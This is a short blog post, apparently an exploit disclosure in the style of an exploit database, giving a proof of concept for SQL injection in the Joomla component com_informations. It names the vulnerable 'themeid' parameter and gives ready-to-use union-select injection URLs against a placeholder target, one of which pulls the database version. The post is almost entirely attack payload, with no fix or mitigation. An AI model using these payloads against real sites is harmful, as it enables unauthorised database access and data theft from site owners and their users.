السبت، 22 أغسطس 2015

Joomla com_informations - SQL Injection

Joomla com_informations - SQL Injection 

2. Proof of Concept
  
http://[target]/index.php?option=com_informations&view=sousthemes&themeid=-3 (SQLI)
  
Injected column is # 3
  
http://[target]//index.php?option=com_informations&view=sousthemes&themeid=999.9+union+select+111,222,version()%23
  

ليست هناك تعليقات:

إرسال تعليق